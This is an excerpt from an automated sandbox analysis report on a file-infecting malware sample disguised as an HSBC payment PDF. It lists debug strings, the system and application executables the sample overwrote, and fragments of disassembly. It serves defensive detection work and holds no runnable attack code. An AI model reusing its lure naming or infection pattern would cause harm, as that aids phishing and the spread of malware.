                  Source: Binary string: mavinject32.pdb source: armsvc.exe, 00000002.00000003.2633067846.0000000002180000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2628302766.00000000021A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdbGCTL source: armsvc.exe, 00000002.00000003.2158998087.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.2508157176.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb source: armsvc.exe, 00000002.00000003.2783650894.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000002.00000003.2614372784.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: firefox.pdb source: armsvc.exe, 00000002.00000003.2776337614.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000002.00000003.2489813894.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: firefox.pdbP source: armsvc.exe, 00000002.00000003.2776337614.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000002.00000003.2429484091.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
                  Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000002.00000003.2525911259.0000000002180000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
                  Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000002.00000003.2449580462.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000002.00000003.2494075294.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: private_browsing.pdbp source: private_browsing.exe.2.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: armsvc.exe, 00000002.00000003.2520750175.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000002.00000003.2783650894.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000002.00000003.2540240807.00000000019C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2532596834.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 00000002.00000003.2212157226.00000000021B0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: TieringEngineService.pdb source: armsvc.exe, 00000002.00000003.2181024271.0000000002200000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000002.00000003.2181024271.0000000002200000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdbr source: AdobeARMHelper.exe.2.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000002.00000003.2455646174.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ALG.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2090731702.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: minidump-analyzer.pdb source: minidump-analyzer.exe.2.dr
                  Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2111485745.0000000004140000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe_x64.pdb source: Aut2exe_x64.exe.2.dr
                  Source: Binary string: ALG.pdbGCTL source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2090731702.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2124835296.0000000004130000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2156732156.00000000021E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officesvcmgr.exe.2.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000002.00000003.2296158721.00000000020F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wbengine.pdbGCTL source: wbengine.exe.2.dr
                  Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb source: officesvcmgr.exe.2.dr
                  Source: Binary string: ssh-agent.pdbX source: armsvc.exe, 00000002.00000003.2175446283.0000000002200000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdb source: armsvc.exe, 00000002.00000003.2609607534.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdb source: armsvc.exe, 00000002.00000003.2158998087.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.2494075294.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000002.00000003.2455646174.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000002.00000003.2609607534.0000000002180000.00000004.00001000.00020000.00000000.sdmp

                  Spreading

                  barindex
                  Infects executable files (exe, dll, sys, html)
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 019AB841h17_2_019AB57F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 019AC212h17_2_019ABDF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 019AF4A2h17_2_019AF1E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 019AC212h17_2_019AC13F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 019AE798h17_2_019AE4E1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 019AFA30h17_2_019AF779
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 019AEBF0h17_2_019AE938
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 019AF048h17_2_019AED95
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 019AC212h17_2_019ABDE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068E969Dh17_2_068E9360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068EE988h17_2_068EE6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068E8901h17_2_068E8658
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068EAA58h17_2_068EA7B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068EB760h17_2_068EB4B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068ED828h17_2_068ED580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068EE530h17_2_068EE288
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068E84A9h17_2_068E8200
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068EF690h17_2_068EF3E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068EB308h17_2_068EB060
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068ED3D0h17_2_068ED128
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068EE0D8h17_2_068EDE30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068EF238h17_2_068EEF90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068E91B1h17_2_068E8F08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068EAEB0h17_2_068EAC08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068E8051h17_2_068E7DA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068EC010h17_2_068EBD68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068E8D59h17_2_068E8AB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068EEDE0h17_2_068EEB38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068EFAE8h17_2_068EF840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068EDC80h17_2_068ED9D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 068EBBB8h17_2_068EB910

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
